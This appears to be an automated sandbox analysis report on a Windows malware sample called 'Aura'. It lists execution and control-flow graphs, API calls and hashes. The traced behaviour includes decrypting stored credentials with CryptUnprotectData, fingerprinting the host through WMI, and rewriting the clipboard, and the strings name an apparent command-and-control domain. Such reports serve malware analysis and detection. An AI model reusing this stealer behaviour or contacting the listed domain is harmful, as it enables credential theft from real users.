                                                                                                                                                                                                                                                    execution_graph 33885 408680 33887 40868f 33885->33887 33886 40898f ExitProcess 33887->33886 33888 4086a4 GetCurrentProcessId GetCurrentThreadId 33887->33888 33889 408978 33887->33889 33890 4086ca 33888->33890 33891 4086ce SHGetSpecialFolderPathW 33888->33891 33892 408981 33889->33892 33890->33891 33894 408800 33891->33894 33901 43cf00 FreeLibrary 33892->33901 33895 408896 GetForegroundWindow 33894->33895 33896 4088af 33895->33896 33896->33889 33900 40c830 CoInitializeEx 33896->33900 33901->33886 33902 433302 33903 433307 33902->33903 33904 43333d GetSystemMetrics GetSystemMetrics 33903->33904 33905 43337c 33904->33905 33906 421600 33907 42160e 33906->33907 33910 421660 33906->33910 33912 421720 33907->33912 33913 421730 33912->33913 33914 440220 LdrInitializeThunk 33913->33914 33915 42180f 33914->33915 33916 438000 33917 438025 33916->33917 33920 43809c 33917->33920 33925 43cfa0 LdrInitializeThunk 33917->33925 33918 43811c 33920->33918 33922 438172 33920->33922 33924 43cfa0 LdrInitializeThunk 33920->33924 33922->33918 33926 43cfa0 LdrInitializeThunk 33922->33926 33924->33920 33925->33917 33926->33922 33767 40d645 33768 40d660 33767->33768 33771 40d6be 33768->33771 33793 43cfa0 LdrInitializeThunk 33768->33793 33769 40d74e 33789 4239a0 33769->33789 33771->33769 33794 43cfa0 LdrInitializeThunk 33771->33794 33774 40deca 33775 424200 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 33774->33775 33776 40deea 33775->33776 33777 424460 RtlExpandEnvironmentStrings RtlFreeHeap LdrInitializeThunk 33776->33777 33778 40df0a 33777->33778 33779 4260e0 RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 33778->33779 33780 40df2a 33779->33780 33781 4269e0 RtlFreeHeap LdrInitializeThunk 33780->33781 33782 40df33 33781->33782 33783 426e30 RtlFreeHeap LdrInitializeThunk 33782->33783 33784 40df3c 33783->33784 33785 4298f0 RtlExpandEnvironmentStrings RtlExpandEnvironmentStrings LdrInitializeThunk 33784->33785 33786 40df45 33785->33786 33787 432c00 6 API calls 33786->33787 33788 40df8e 33787->33788 33790 423a00 33789->33790 33790->33790 33791 423a1d RtlExpandEnvironmentStrings 33790->33791 33792 423a70 33791->33792 33792->33792 33793->33771 33794->33769 33795 40e045 33796 40e04b 33795->33796 33799 4120a0 33796->33799 33798 40e054 33807 4120b9 33799->33807 33800 4120c0 33800->33798 33801 412691 RtlExpandEnvironmentStrings 33801->33807 33802 43b4a0 RtlFreeHeap 33802->33807 33803 413bf1 CreateThread 33803->33807 33804 41295f RtlExpandEnvironmentStrings 33804->33807 33807->33800 33807->33801 33807->33802 33807->33803 33807->33804 33808 43cfa0 LdrInitializeThunk 33807->33808 33809 43fef0 LdrInitializeThunk 33807->33809 33810 440610 LdrInitializeThunk 33807->33810 33808->33807 33809->33807 33810->33807 33927 43b485 RtlAllocateHeap 33816 5941000 33817 5941102 33816->33817 33818 5941012 33816->33818 33819 5941030 Sleep 33818->33819 33820 594103a OpenClipboard 33818->33820 33819->33818 33821 59410f9 GetClipboardSequenceNumber 33820->33821 33822 594104a GetClipboardData 33820->33822 33821->33818 33823 59410f3 CloseClipboard 33822->33823 33824 594105a GlobalLock 33822->33824 33823->33821 33824->33823 33825 594106b GlobalAlloc 33824->33825 33827 594109d GlobalLock 33825->33827 33828 59410e9 GlobalUnlock 33825->33828 33829 59410b0 33827->33829 33828->33823 33830 59410b9 GlobalUnlock 33829->33830 33831 59410e0 GlobalFree 33830->33831 33832 59410cb EmptyClipboard SetClipboardData 33830->33832 33831->33828 33832->33828 33832->33831 33833 423257 33835 42326a 33833->33835 33836 42358f 33833->33836 33834 4237d0 33835->33836 33840 43cfa0 LdrInitializeThunk 33835->33840 33836->33834 33839 43cfa0 LdrInitializeThunk 33836->33839 33839->33836 33840->33835 33928 43db15 33929 43db30 33928->33929 33932 43db7e 33929->33932 33935 43cfa0 LdrInitializeThunk 33929->33935 33930 43dc0e 33932->33930 33934 43cfa0 LdrInitializeThunk 33932->33934 33934->33930 33935->33932 33841 435ed4 33844 435eef 33841->33844 33842 435efd GetUserDefaultUILanguage 33843 435f23 33842->33843 33844->33842 33936 423115 33937 423152 33936->33937 33940 43cfa0 LdrInitializeThunk 33937->33940 33939 4238e6 33940->33939 33941 40b11d 33942 40b12b 33941->33942 33944 40b132 33941->33944 33944->33942 33945 43cf20 33944->33945 33946 43cf81 33945->33946 33947 43cf46 33945->33947 33948 43cf38 33945->33948 33949 43cf5a 33945->33949 33952 43b4a0 33946->33952 33951 43cf4b RtlReAllocateHeap 33947->33951 33948->33946 33948->33947 33949->33944 33951->33949 33953 43b4b3 33952->33953 33954 43b4c4 33952->33954 33955 43b4b8 RtlFreeHeap 33953->33955 33954->33949 33955->33954 33845 40dade 33846 40db60 33845->33846 33848 40dbbe 33846->33848 33849 43cfa0 LdrInitializeThunk 33846->33849 33849->33848 33850 419861 33852 419994 33850->33852 33853 419a0e 33850->33853 33854 41986d 33850->33854 33852->33852 33852->33853 33860 41c980 LdrInitializeThunk 33852->33860 33856 440220 33854->33856 33857 440240 33856->33857 33858 44038e 33857->33858 33861 43cfa0 LdrInitializeThunk 33857->33861 33858->33852 33860->33853 33861->33858 33862 423ae0 33863 423afd 33862->33863 33864 440220 LdrInitializeThunk 33863->33864 33865 423c21 33864->33865 33865->33865 33866 440220 LdrInitializeThunk 33865->33866 33866->33865 33956 40d8a2 33957 40d8c0 33956->33957 33960 4382f0 33957->33960 33959 40d9a3 33959->33959 33961 438320 CoCreateInstance 33960->33961 33963 438963 33961->33963 33964 4385c4 SysAllocString 33961->33964 33965 438973 GetVolumeInformationW 33963->33965 33967 43863a 33964->33967 33973 43898d 33965->33973 33968 438953 SysFreeString 33967->33968 33969 438642 CoSetProxyBlanket 33967->33969 33968->33963 33970 438662 SysAllocString 33969->33970 33971 438949 33969->33971 33974 438720 33970->33974 33971->33968 33973->33959 33974->33974 33975 438743 SysAllocString 33974->33975 33977 438766 33975->33977 33976 438933 SysFreeString SysFreeString 33976->33971 33977->33976 33978 438929 33977->33978 33979 4387aa VariantInit 33977->33979 33978->33976 33981 438800 33979->33981 33980 438918 VariantClear 33980->33978 33981->33980 33982 43d7a7 33983 43d7d0 33982->33983 33984 43d81e 33983->33984 33989 43cfa0 LdrInitializeThunk 33983->33989 33988 43cfa0 LdrInitializeThunk 33984->33988 33987 43d911 33988->33987 33989->33984 33867 40c865 CoInitializeSecurity 33990 415729 33991 41572e 33990->33991 34016 4403e0 33991->34016 33993 415761 33994 415747 33994->33993 33996 41599e 33994->33996 33998 41578c 33994->33998 33999 41584e 33994->33999 34020 4404a0 33994->34020 33997 415c2a 33996->33997 34007 415c00 CryptUnprotectData 33996->34007 34000 415f12 33997->34000 34004 415d1f 33997->34004 34005 415f17 33997->34005 33998->33993 33998->33996 33998->33999 34026 43cfa0 LdrInitializeThunk 33998->34026 33999->33996 34027 43cfa0 LdrInitializeThunk 33999->34027 34029 419be0 FreeLibrary FreeLibrary RtlFreeHeap LdrInitializeThunk 34000->34029 34004->34005 34006 415e1d 34004->34006 34015 416032 34005->34015 34030 43cfa0 LdrInitializeThunk 34005->34030 34028 41c980 LdrInitializeThunk 34006->34028 34007->33997 34007->34005 34008 416490 34010 41671a 34032 43cfa0 LdrInitializeThunk 34010->34032 34013 415f01 34015->34008 34015->34010 34031 43cfa0 LdrInitializeThunk 34015->34031 34018 440400 34016->34018 34017 44044e 34017->33994 34018->34017 34033 43cfa0 LdrInitializeThunk 34018->34033 34021 4404c0 34020->34021 34024 44051e 34021->34024 34034 43cfa0 LdrInitializeThunk 34021->34034 34022 4405be 34022->33998 34024->34022 34035 43cfa0 LdrInitializeThunk 34024->34035 34026->33999 34027->33996 34028->34013 34029->34005 34030->34015 34031->34015 34032->34013 34033->34017 34034->34024 34035->34022 34036 43d1aa GetForegroundWindow 34040 43f030 34036->34040 34038 43d1b8 GetForegroundWindow 34039 43d1ce 34038->34039 34041 43f040 34040->34041 34041->34038 33868 42f568 33871 414510 33868->33871 33870 42f56d CoSetProxyBlanket 33871->33870 34042 436129 34045 436150 34042->34045 34043 436181 34045->34043 34046 43cfa0 LdrInitializeThunk 34045->34046 34046->34045 33872 4324ef CoSetProxyBlanket 33873 409bec 33874 409c40 33873->33874 33874->33874 33875 409cc4 LoadLibraryExW 33874->33875 33876 409cd5 33875->33876 34055 42c533 34056 42c53f GetComputerNameExA 34055->34056 34058 4219b0 34070 440090 34058->34070 34060 4220f2 34061 42206b 34063 43b4a0 RtlFreeHeap 34061->34063 34065 422077 34063->34065 34064 4219f0 34064->34060 34069 421ab0 34064->34069 34074 43cfa0 LdrInitializeThunk 34064->34074 34065->34060 34076 43cfa0 LdrInitializeThunk 34065->34076 34068 43b4a0 RtlFreeHeap 34068->34069 34069->34061 34069->34068 34075 43cfa0 LdrInitializeThunk 34069->34075 34071 4400b0 34070->34071 34071->34071 34072 4401ce 34071->34072 34077 43cfa0 LdrInitializeThunk 34071->34077 34072->34064 34074->34064 34075->34069 34076->34065 34077->34072 33877 40e1fa 33883 4096a0 33877->33883 33879 40e206 CoUninitialize 33880 40e230 33879->33880 33881 40e642 CoUninitialize 33880->33881 33882 40e660 33881->33882 33884 4096b4 33883->33884 33884->33879 34078 422c3f 34079 422cf1 34078->34079 34080 422c57 34078->34080 34080->34079 34082 43cfa0 LdrInitializeThunk 34080->34082 34082->34080 34083 42c8bc 34084 42c8e0 34083->34084 34085 42ca24 GetPhysicallyInstalledSystemMemory 34084->34085 34086 42ca50 34085->34086 34086->34086
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: $!$!$"$#$$$%$&$'$'$)$*$+$-$-$.$/$1$3$3$5$7$9$:$:$;$=$?$?$B$C$D$D$E$G$I$I$K$K$K$L$L$M$M$P$Q$Q$R$R$R$S$S$T$U$U$W$W$W$W$W$Y$Y$[$[$]$]$_$_$_$`$c$h$h$h$h$h$h$i$i$i$i$i$i$j$j$j$j$j$j$k$k$k$k$k$k$n$p$r$s$t$v$w$w$|
                                                                                                                                                                                                                                                    • API String ID: 0-1509883943
                                                                                                                                                                                                                                                    • Opcode ID: 151c40ac38c4bea637db949ea2a2d5077752ccff992ba821a808d391e990f6c2
                                                                                                                                                                                                                                                    • Instruction ID: 107fd670d6a33d6bd3af48058be63227e4c1e44791ac504fabef9b213ebb4519
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 151c40ac38c4bea637db949ea2a2d5077752ccff992ba821a808d391e990f6c2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C913D07150C7C08ED3349B38888439FBFD1AB96324F188A6EE5E9873D2D6B88585C757
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: $aA$'+5>$2)!*$41##$7\A$>"0$MfA$kjih$kjih$~t~{$nVA$L4$L4
                                                                                                                                                                                                                                                    • API String ID: 0-705411989
                                                                                                                                                                                                                                                    • Opcode ID: a038ddd7a4fba88be4bd41d0b89a0969865ad0c869122aac13da161970b1766d
                                                                                                                                                                                                                                                    • Instruction ID: 51b238df478912f03407f53bcd861463622d7a63e5711f880fdd80badda0364d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a038ddd7a4fba88be4bd41d0b89a0969865ad0c869122aac13da161970b1766d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32823475609242CFD724CF24D8817AFB7E2EBC5314F19893EE48987392D7389845CB8A

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 807 4382f0-438315 808 438320-43833c 807->808 808->808 809 43833e-438351 808->809 810 438360-4383b2 809->810 810->810 811 4383b4-4383f3 810->811 812 438400-43841f 811->812 812->812 813 438421-43843d 812->813 815 438443-43844f 813->815 816 43850b-438516 813->816 818 438450-4384bb 815->818 817 438520-438561 816->817 817->817 820 438563-4385be CoCreateInstance 817->820 818->818 819 4384bd-4384ce 818->819 821 4384d0-4384fb 819->821 822 438963-43898b call 43eab0 GetVolumeInformationW 820->822 823 4385c4-4385f5 820->823 821->821 824 4384fd-438507 821->824 829 438995-438997 822->829 830 43898d-438991 822->830 825 438600-438614 823->825 824->816 825->825 828 438616-43863c SysAllocString 825->828 835 438953-43895f SysFreeString 828->835 836 438642-43865c CoSetProxyBlanket 828->836 831 4389ad-4389b4 829->831 830->829 833 4389c0-4389d6 831->833 834 4389b6-4389bd 831->834 837 4389e0-4389f2 833->837 834->833 835->822 838 438662-438674 836->838 839 438949-43894f 836->839 837->837 840 4389f4-438a2f 837->840 841 438680-438694 838->841 839->835 842 438a30-438a76 840->842 841->841 843 438696-438712 SysAllocString 841->843 842->842 844 438a78-438aaf call 41e3a0 842->844 845 438720-438741 843->845 850 438ab0-438ab8 844->850 845->845 846 438743-438768 SysAllocString 845->846 851 438933-438945 SysFreeString * 2 846->851 852 43876e-438790 846->852 850->850 853 438aba-438abc 850->853 851->839 860 438796-438799 852->860 861 438929-43892f 852->861 854 438ac2-438ad2 call 4080d0 853->854 855 4389a0-4389a7 853->855 854->855 855->831 857 438ad7-438ade 855->857 860->861 862 43879f-4387a4 860->862 861->851 862->861 863 4387aa-4387f2 VariantInit 862->863 864 438800-438836 863->864 864->864 865 438838-43884a 864->865 866 43884e-438850 865->866 867 438856-43885c 866->867 868 438918-438925 VariantClear 866->868 867->868 869 438862-438870 867->869 868->861 870 438872-438877 869->870 871 4388ad 869->871 872 43888c-438890 870->872 873 4388af-4388d7 call 408050 call 408d10 871->873 874 438892-43889b 872->874 875 438880 872->875 884 4388d9 873->884 885 4388de-4388ea 873->885 878 4388a2-4388a6 874->878 879 43889d-4388a0 874->879 877 438881-43888a 875->877 877->872 877->873 878->877 881 4388a8-4388ab 878->881 879->877 881->877 884->885 886 4388f1-438914 call 408080 call 408060 885->886 887 4388ec 885->887 886->868 887->886
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(0044268C,00000000,00000001,0044267C), ref: 004385B2
                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(0000AA09), ref: 00438617
                                                                                                                                                                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00438654
                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(0000AA09), ref: 00438697
                                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(0000AA09), ref: 00438744
                                                                                                                                                                                                                                                    • VariantInit.OLEAUT32( )*+), ref: 004387AF
                                                                                                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00438919
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 0043893D
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00438943
                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00438954
                                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,0000AA09,00000000,00000000,00000000,00000000), ref: 00438984
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                                                                                                                                    • String ID: )*+$\]^_
                                                                                                                                                                                                                                                    • API String ID: 2573436264-2322973909
                                                                                                                                                                                                                                                    • Opcode ID: ad9a5df13a79529466875a2391a2d9c4f178ea59c0f8a74a64ccf3bd56a8d54e
                                                                                                                                                                                                                                                    • Instruction ID: 2e71509d261cad856181e072583a0b97192b489e60390a5bbc3d405ab7213408
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ad9a5df13a79529466875a2391a2d9c4f178ea59c0f8a74a64ccf3bd56a8d54e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0712FEB6A083009BE314DF25C88176BBBE1EFC9314F14592EF5D49B391DB78D8068B96

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000001), ref: 05941032
                                                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 0594103C
                                                                                                                                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 0594104C
                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0594105D
                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 05941090
                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32 ref: 059410A0
                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32 ref: 059410C1
                                                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 059410CB
                                                                                                                                                                                                                                                    • SetClipboardData.USER32(0000000D), ref: 059410D6
                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32 ref: 059410E3
                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(?), ref: 059410ED
                                                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 059410F3
                                                                                                                                                                                                                                                    • GetClipboardSequenceNumber.USER32 ref: 059410F9
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511764736.0000000005941000.00000020.00000800.00020000.00000000.sdmp, Offset: 05940000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511748351.0000000005940000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511780747.0000000005942000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_5940000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1416286485-0
                                                                                                                                                                                                                                                    • Opcode ID: 8fa508c330ca9ad77a42fe343c1acf04bd94308097d6b381f39f5dd7216c6f04
                                                                                                                                                                                                                                                    • Instruction ID: d1a74190dea584d5f6912d3f38ea1c2662a985a48467d6c4d5a10d1a525b6b69
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8fa508c330ca9ad77a42fe343c1acf04bd94308097d6b381f39f5dd7216c6f04
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F216D396182509BDF202BB1AC0AF7A7BBCFF04A85F040428F946D6150EB618C80EFA1

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1020 40e1fa-40e224 call 4096a0 CoUninitialize 1023 40e230-40e270 1020->1023 1023->1023 1024 40e272-40e28a 1023->1024 1025 40e290-40e2d8 1024->1025 1025->1025 1026 40e2da-40e337 1025->1026 1027 40e340-40e364 1026->1027 1027->1027 1028 40e366-40e377 1027->1028 1029 40e379-40e387 1028->1029 1030 40e39b-40e3a3 1028->1030 1031 40e390-40e399 1029->1031 1032 40e3a5-40e3a6 1030->1032 1033 40e3bb-40e3c8 1030->1033 1031->1030 1031->1031 1034 40e3b0-40e3b9 1032->1034 1035 40e3ca-40e3d1 1033->1035 1036 40e3eb-40e3f3 1033->1036 1034->1033 1034->1034 1037 40e3e0-40e3e9 1035->1037 1038 40e3f5-40e3f6 1036->1038 1039 40e40b-40e415 1036->1039 1037->1036 1037->1037 1040 40e400-40e409 1038->1040 1041 40e417-40e41b 1039->1041 1042 40e42b-40e437 1039->1042 1040->1039 1040->1040 1043 40e420-40e429 1041->1043 1044 40e451-40e57e 1042->1044 1045 40e439-40e43b 1042->1045 1043->1042 1043->1043 1047 40e580-40e5c3 1044->1047 1046 40e440-40e44d 1045->1046 1046->1046 1048 40e44f 1046->1048 1047->1047 1049 40e5c5-40e5eb 1047->1049 1048->1044 1050 40e5f0-40e602 1049->1050 1050->1050 1051 40e604-40e65e call 40b750 call 4096a0 CoUninitialize 1050->1051 1056 40e660-40e6a0 1051->1056 1056->1056 1057 40e6a2-40e6ba 1056->1057 1058 40e6c0-40e708 1057->1058 1058->1058 1059 40e70a-40e767 1058->1059 1060 40e770-40e794 1059->1060 1060->1060 1061 40e796-40e7a7 1060->1061 1062 40e7a9-40e7b7 1061->1062 1063 40e7cb-40e7d3 1061->1063 1064 40e7c0-40e7c9 1062->1064 1065 40e7d5-40e7d6 1063->1065 1066 40e7eb-40e7f8 1063->1066 1064->1063 1064->1064 1067 40e7e0-40e7e9 1065->1067 1068 40e7fa-40e801 1066->1068 1069 40e81b-40e823 1066->1069 1067->1066 1067->1067 1070 40e810-40e819 1068->1070 1071 40e825-40e826 1069->1071 1072 40e83b-40e845 1069->1072 1070->1069 1070->1070 1075 40e830-40e839 1071->1075 1073 40e847-40e84b 1072->1073 1074 40e85b-40e867 1072->1074 1076 40e850-40e859 1073->1076 1077 40e881-40e99f 1074->1077 1078 40e869-40e86b 1074->1078 1075->1072 1075->1075 1076->1074 1076->1076 1080 40e9a0-40e9e3 1077->1080 1079 40e870-40e87d 1078->1079 1079->1079 1081 40e87f 1079->1081 1080->1080 1082 40e9e5-40e9ff 1080->1082 1081->1077 1083 40ea00-40ea12 1082->1083 1083->1083 1084 40ea14-40ea60 call 40b750 1083->1084
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Uninitialize
                                                                                                                                                                                                                                                    • String ID: Ds$]f$lev-tolstoi.com$}v
                                                                                                                                                                                                                                                    • API String ID: 3861434553-762171579
                                                                                                                                                                                                                                                    • Opcode ID: 9c9c872ceee5d1727b78cb835495f79685d7af6cdecb67afa127824de112cc5a
                                                                                                                                                                                                                                                    • Instruction ID: 28d4e5588af879f351e0c55689ec10c05792b3d9381e9559039d1688d12df22d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c9c872ceee5d1727b78cb835495f79685d7af6cdecb67afa127824de112cc5a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D12DEB154D3D18ED335CF2988907DBBFE1AFD2304F1989ADD8D86B252C6384906CB96

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 1087 408680-408691 call 43c730 1090 408697-40869e call 435910 1087->1090 1091 40898f-408991 ExitProcess 1087->1091 1094 4086a4-4086c8 GetCurrentProcessId GetCurrentThreadId 1090->1094 1095 408978-40897f 1090->1095 1096 4086ca-4086cc 1094->1096 1097 4086ce-4087ff SHGetSpecialFolderPathW 1094->1097 1098 408981-408987 call 408060 1095->1098 1099 40898a call 43cf00 1095->1099 1096->1097 1100 408800-408823 1097->1100 1098->1099 1099->1091 1100->1100 1103 408825-408851 call 43b460 1100->1103 1107 408860-40887c 1103->1107 1108 408896-4088a9 GetForegroundWindow 1107->1108 1109 40887e-408894 1107->1109 1110 408954-40896c call 409ba0 1108->1110 1111 4088af-4088db 1108->1111 1109->1107 1110->1095 1116 40896e call 40c830 1110->1116 1112 4088e1-408952 1111->1112 1113 4088dd-4088df 1111->1113 1112->1110 1113->1112 1118 408973 call 40b720 1116->1118 1118->1095
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 004086A4
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 004086AE
                                                                                                                                                                                                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000,?), ref: 004087DD
                                                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 004088A1
                                                                                                                                                                                                                                                      • Part of subcall function 0040C830: CoInitializeEx.COMBASE(00000000,00000002), ref: 0040C843
                                                                                                                                                                                                                                                      • Part of subcall function 0040B720: FreeLibrary.KERNEL32(00408978), ref: 0040B726
                                                                                                                                                                                                                                                      • Part of subcall function 0040B720: FreeLibrary.KERNEL32 ref: 0040B747
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00408991
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3511052669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3511052669.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_400000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3072701918-0
                                                                                                                                                                                                                                                    • Opcode ID: e843ce397e95a7a4f9e2afb866568efc9843b9a29ca9dad48084fef23a3395c2
                                                                                                                                                                                                                                                    • Instruction ID: 719c045ee3bb05490b25d200acc1df5498f9a5c5afb4084d0d06abb797ad2041
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e843ce397e95a7a4f9e2afb866568efc9843b9a29ca9dad48084fef23a3395c2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57713B77A047144FD318EF69CD5632BB6D6ABC8310F09C53EA8C5EB391EA789C018789

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
